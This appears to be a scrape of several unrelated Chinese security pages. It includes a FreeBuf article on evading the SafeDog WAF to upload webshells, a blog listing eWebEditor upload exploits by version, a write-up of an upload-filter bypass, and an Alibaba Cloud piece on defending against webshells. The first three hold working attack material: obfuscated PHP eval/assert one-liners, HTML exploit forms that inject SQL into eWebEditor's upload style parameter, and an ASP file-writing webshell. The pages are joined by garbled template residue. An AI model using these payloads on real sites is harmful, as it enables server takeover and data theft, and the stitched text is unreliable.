绕过网站安全狗拦截，上传Webshell技巧总结（附免杀PHP一句话） - FreeBuf互联网安全新媒体平台 | 关注黑客与极客
绕过网站安全狗拦截，上传Webshell技巧总结（附免杀PHP一句话）
共655699人围观
，发现 39 个不明物体
*本文原创作者：1_2，本文属FreeBuf原创奖励计划，未经许可禁止转载
这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。
思路是：修改HTTP请求，构成畸形HTTP请求，然后绕过网站安全狗的检测。
废话不多说，切入正题。。。。
1、实验环境：
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048
2、用于文件上传的PHP源码：
&?php $path = dirname(__FILE__) . '/upload/'; $rand = rand(0,30); move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]); echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "&br/&"; echo "OK";?&
因为此次实验的目的是绕过网站安全狗，所以PHP源码上我没做任何检测，把上传的文件直接放在upload目录下。
3、先看一下正常的HTTP请求：
很明显，文件名为”yijuhua.php”被拦截。。。。
4、尝试%00截断：
很明显，失败了。。。
5、修改HTTP请求，构造畸形HTTP请求
(1)删除实体里面的Conten-Type字段：
绕过网站安全狗的拦截，成功上传WebShell。。。
(2)删除Content-Disposition字段里的空格：
(3)修改Content-Disposition字段值的大小写：
6、菜刀连接一句话：
到此，上传WebShell结束，各位看明白了吗？
7、免杀PHP一句话：
&?php /* PHP一句话木马 assert($string) */ $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i&count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']);?&
8、修复漏洞：
出现这种情况，我认为是网站安全狗在开发时没有考虑到畸形HTTP请求，而Apache却兼容畸形HTTP请求，所以能够上传成功。
*本文原创作者：1_2（QQ:），本文属FreeBuf原创奖励计划，未经许可禁止转载
很久之前在土司看到过，所以你肯定不是原创
怎么说呢，作者贡献的精神值得鼓励，但是从文章上来看给人的感觉就是，作者本身积累也没有多少，至于免杀一句话，多搞几行代码，随便变化一下
一大把的免杀，
文章毫无亮点， 个人认为单纯只是为了秀一秀，让我惊讶的是，这种文章FB 竟然还有现金奖励。
必须您当前尚未登录。
必须（保密）
这家伙太懒，还未填写个人描述！
关注我们 分享每日精选文章
可以给我们打个分吗？版权声明：本站的信息和链接版权归相关公司所有，仅供宽带网用户测试研究用途。
如侵犯到您的权利请通知我们，我们确认之后将立即清除。www.shizheba.com温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
&&& &http://xxxxx.com/ewebeditor.asp?id=NewsContent&style=s_full&&& &直接这个地址，出现一堆编辑框，有远程上传，先点感叹号！查看版本！&2.1.6 的直接用此 exp：&&以下是引用片段：&&&HTML&&HEAD&&TITLE&ewebeditor的upload文件上传 exp&/TITLE&&meta http-equiv="Content-Type" content="text/ charset=gb2312"& &/head&&body bgcolor=orange& &&tr&不是通杀，版本有区别！我就郁闷，落叶那JJ说文章没说清楚，这份EXP就是根据文章写出来的！落叶那家伙的EXP我看半天没看明白有啥区别！&br&&/tr&&&tr&文件传到了uploadfile目录下了&/tr&&br&&&tr&不知道算不算0day，我是冰的原点&/tr&&br&&&tr&至于利用方法就是修改源文件中的action，然后传cer的马马就行了！&/tr&&br&&&form action="http://要上传的网址/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox’%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name=’standard’%20and%20’a’=’a" method=post name=myform enctype="multipart/form-data"&&input type=file name=uploadfile size=100 style="width:100%"&&input type=submit value=传吧&&/form&&&&2.1.6 以前版本的用此 exp：&&以下是引用片段：&&&H1&ewebeditor asp版 1.0.0 上传漏洞利用程序----By HCocoa&/H1&&br&&br&&&form action="http://要上传的地址/ewebeditor/upload.asp?action=save&type=IMAGE&style=hcocoa’ union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer|aspx’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name=’standard’and’a’=’a" method=post name=myform enctype="multipart/form-data"&&&input type=file name=uploadfile size=100&&br&&br&&&input type=submit value=Fuck&&&/form&&&& & 如果目录不充许执行脚本，要换目录，用这个 exp.... /db 可以自定义，不过要绝对路径！&&以下是引用片段：&&&form action="http://www.xxx.com/upload.asp?action=save&type=IMAGE&style=horind’ union select S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b’/../db’,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|asa’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a" method=post name=myform enctype="multipart/form-data"& & & &&input type=file name=uploadfile size=100&&br&&br& & & &&input type=submit value=Fuck& & & &&/form&&2.7.0 版本注入点：&&& &http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200&&& &默认表名：eWebEditor_System默认列名：sys_UserName、sys_UserPass，然后利用nbsi进行猜解，对此进行注入取得账号密码。&&& & ewebeditor 2.7.5 上传漏洞：这个用在修改了可以上传asa但是提示没有工具栏的情况下，作者不明。&&以下是引用片段：&&&form action="http://要上传的网址/ewebedit/upload.asp?action=save&type=& style=可以上传asa的样式名" method=post name=myform enctype="multipart/form-data"&&&input type=file name=uploadfile size=1 style="width:100%"&&&input type=submit value="上传了"&&/input&&&/form&&&Ewebeditor 在线HTML编辑器各种版本拿 WebShell 方法&&& & 这个要下载它的数据库看有没有前辈的脚印才能利用！&&& & ewebeditor 2.8.0 上传漏洞：前提要开启远程上传，然后传一个webshell.jpg.asp即可，查看源代码即可获得shell地址。&这0day我从来没成功过，不知道是真还是假！不过用另一个成功过。&&& & http://xxx.com/ewebeditor.asp?id=NewsContent&style=s_full&&& & 调用这个样式，会出现远程上传按纽，再用下面的方法远程上传！&&& & 远程上传时执行代码，导致 get shell。&&1、把 x.jpg.asp xiaoma.ASa 放在同一目录下：&&—————————————————x.jpg.asp———————————————&&&% &Set fs = CreateObject("Scripting.FileSystemObject") &Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0) &Thetext=MyTextStream.ReadAll &response.write thetext &%&&&——————————————————————x.jpg.asp—————————————————————&&&&—————————————————————xiaoma.ASa—————————————————————&&&%on error resume next%& &%ofso="scripting.filesystemobject"%& &%set fso=server.createobject(ofso)%& &%path=request("path")%& &%if path&&"" then%& &%data=request("dama")%& &%set dama=fso.createtextfile(path,true)%& &%dama.write data%& &%if err=0 then%& &%="success"%& &%else%& &%="false"%& &%end if%& &%err.clear%& &%end if%& &%dama.close%& &%set dama=nothing%& &%set fos=nothing%& &%="&form action=’’ method=post&"%& &%="&input type=text name=path&"%& &%="&br&"%& &%=server.mappath(request.servervariables("script_name"))%& &%="&br&"%& &%=""%& &%="&textarea name=dama cols=50 rows=10 width=30&&/textarea&"%& &%="&br&"%& &%="&input type=submit value=save&"%& &%="&/form&"%&&&—————————————————————xiaoma.ASa—————————————————————&&2、远程上传 x.jpg.asp：&&& & 会自动执行脚本，上传小马!&&& & tools 里的一位老大发现的删除文件漏洞，我试过没用，一般都没权限，这里不说。&ASPX 版：&&&& &受影响文件：eWebEditorNet/upload.aspx&&& & 利用方法：添好本地的cer的Shell文件。在浏览器地址栏输入 javascript:lbtnUpload.click(); 就能得到shell。嘿嘿....绕过了限制......成功的上传了ASPX文件....文件默认的上传后保存的地址是 eWebEditorNet/UploadFile/现在来看看是否上传成功.....&&& & PHP 版，给出 exp：&Exp：&&form action="" method=post enctype="multipart/form-data"& &&INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"& &&A href="http://hi.baidu.com/%CE%A4%BD%AD%B4%FA/creat/blog/&input"&URL:&input type=text name=url value="http://192.168.1.110/eWebEditor/" size=100&&br& &&INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||&gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh- cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋 体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"& &file:&input type=file name="uploadfile"&&br& &&input type=button value=submit onclick=fsubmit()& &&/form&&br& &&script& &function fsubmit(){ &form = document.forms[0]; &form.action = form.url.value+’php/upload.php?action=save&type=FILE&style=toby57&language=en’; &alert(form.action); &form.submit(); &} &&/script&&&& & Jsp 的版本，根本没有对上传文件类型进行检测！需要注意的是 Jsp 版本的没有上传按钮！直接选择文件，回车就可以提交了！
阅读(924)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'Ewebeditor各种版本拿WebShell 方法',
blogAbstract:'到这个，大家都知道这是老生长谈了。不就ewebeditor么，网上一找一大堆。&& & 我这里有些0day和exp是网上找的。但经验与技巧却是我自己的。技术重要，思路也很重要，不说废话了，看下文！&&& &http://xxxxx.com/ewebeditor.asp?id=NewsContent&style=s_full',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:7,
publishTime:9,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}　　图片上传功能中，前端页面上传的是.png格式的图片文件，但是抓包Request中修改图片后缀为.php
可以绕过对上传文件格式的限制，文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示，
记录下来后用菜刀连接即可。&
（1）网站要求上传png格式的文件
（2）保存-抓包，将文件后缀.png删除，剩余.php文件继续提交,提示成功。
Content-Disposition: form- name="fun_menu_icon"
test123trojan.php
-----------------------------1
Content-Disposition: form- name="fun_menu_icon_upload"; filename="test123trojan.php"
Content-Type: image/png
&?php @eval($_POST['caidao']); ?&
-----------------------------1
Content-Disposition: form- name="fun_menu_img"
test123trojan.php
-----------------------------1
Content-Disposition: form- name="fun_menu_img_upload"; filename="test123trojan.php"
Content-Type: image/png
&?php @eval($_POST['caidao']); ?&
（3）在原始数据提交页面或提交数据后response页面中查找上传路径并记录。
（4）打开最新版中国菜刀，添加已经记录的路径，添加密码caidao
（5）连接虚拟终端，输入ipconfig
木马成功上传并执行。
阅读(...) 评论()阿里云服务器ECS云盾提醒网站被WebShell木马后门分析与对策
阿里云服务器ECS云盾提醒网站被WebShell木马后门分析与对策
据有关报道指出，某政府网站被黑后，有关安全检测技术人员在经过详细排查后，确认是WebShell木马后门。更值得警惕的是黑客对木马文件的代码进行了加密，由此绕过了Web防火墙和防病毒软件的查杀，并且木马文件建立的时间在架设安全设备之前，甚至有若干木马文件一年前就已经存在。
据有关报道指出，某政府网站被黑后，有关安全检测技术人员在经过详细排查后，确认是WebShell木马后门。更值得警惕的是黑客对木马文件的代码进行了加密，由此绕过了Web防火墙和防病毒软件的查杀，并且木马文件建立的时间在架设安全设备之前，甚至有若干木马文件一年前就已经存在。
1.WebShell的概念和危害性
WebShell就是以asP、php、jsp或者cgi等网页文件形式存在的—种命令执行环境，也可以称为—种网页后门。黑客在入侵网站后，通常会将WebShell后门文件与网站服务器WEB目录下正常的网页文件混在—起，然后就可以使用浏览器来访问这些后门，得到命令执行环境，以达到控制网站或者WEB系统服务器的目的(可以上传下载文件、查看数据库、执行任意程序命令等)。
2. 黑客部署WebShell木马后门的几种途径
.黑客直接上传WebShell：因过滤上传文件不严，导致黑客可以直接上传 WebShell到网站任意可写目录中，从而拿到网站的管理员控制权限：
.黑客私自添加修改上传类型：现在很多脚本程序上传模块不是只允许上传合法文件类型，实际上大多数的系统是允许添加上传类型，由此很容易被黑客利用：
.黑客利用WEB系统后台管理功能写入WebShell：黑客进入WEB系统后台
例如网站后台后还可以通过修改相关文件来写入WebS
.黑客利用后台管理工具向配置文件写入WebS
.黑客利用后台数据库备份及恢复功能获得Webshell：主要是利用后台对
access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到WebS
.黑客利用后台mysql数据查询功能获得Wbshell：后台只要有mysql数据查询功能，黑客就可以利用它执行SELECT...in TO OUTFILE查询输出php文件，因为所有的数据是存放在mysql里的，所以黑客可以通过正常手段把WebsheIl代码插入mysql在利用SELECT...in TO OUTFILE语句导出
3.Wbshell的隐蔽性
Wbshell有些恶意网页脚本可以嵌套在正常网页中运行，因此不容易被查
杀。由于与被黑客控制的唧系统服务器或黑客远程主机交换的数据都是通过
80端口传递的，因此Wbshell不会被防火墙拦截。同时，使用Wbshell一般
不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，很难发现入侵痕迹。
4.如何进行加固和防范
.对ftp进行权限设置，取消匿名访问。
.对目录进行权限设置，不同网站使用不同的用户权限。
.对系统盘的敏感目录及文件进行权限设置，提高系统安全性。
.定期更新服务器补丁，定期更新杀毒软件。
用云栖社区APP，舒服~
【云栖快讯】新手小白必看！编程语言系列讲座火爆进行中，与行业资深专家一起学习Python、C++、JavaScript、Java！从入门到进阶&&
国内建站市场NO.1
为您提供简单高效、处理能力可弹性伸缩的计算服务，帮助您快速构建更稳定、安全的应用，提升运维效...
由轻量级Agent和云端组成，集云盾威胁情报于一体，通过Agent和云端大数据的联动，为您提...
阿里云飞天战略营全新发布